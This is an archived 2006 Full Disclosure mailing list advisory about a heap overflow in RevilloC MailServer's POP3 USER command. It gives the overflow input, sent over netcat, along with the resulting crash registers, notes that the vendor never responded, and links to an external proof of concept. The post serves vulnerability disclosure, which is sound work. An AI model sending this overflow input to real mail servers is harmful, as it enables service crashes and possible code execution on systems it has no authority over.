Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:




fulldisclosure logo Full Disclosure mailing list archives

RevilloC mail server USER command heap overflow
From: <securma () morx org>
Date: Tue, 7 Mar 2006 17:38:36 +0100

1-title:
Revilloc mail server "USER" command heap overflow

Product:
Revilloc MailServer and Proxy v 1.21 (http://www.revilloC.com)
The mail server is a central point for emails coming in and going out from home or office The service will work with any standard email client that supports POP3 and SMTP.

2-Vulnerability Description:
sending a large buffer  after USER commands
C:\>nc 127.0.0.1 110
+OK RevilloC POP3 Ready
USER  "A" x4081 + "\xff"x4 + "\xdd"x4 + "\x0d\x0a"
causes access violation when reading [dddddddd].
ntdll!wcsncat+0x387:
7C92B3FB 8B0B MOV ECX,DWORD PTR DS:[EBX]--->EBX pointe to "\xdd"x4
ECX   dddddddd
EAX   FFFFFFFF

3-Status:
14/01/2006  Vendor contacted,No response

4-solution:
no patch no solution...use another mail server

5-credit:
securma massine from MorX Security Research Team

6-PoC/Exploit at:
http://www.morx.org/rev.txt



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • RevilloC mail server USER command heap overflow securma (Mar 08)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]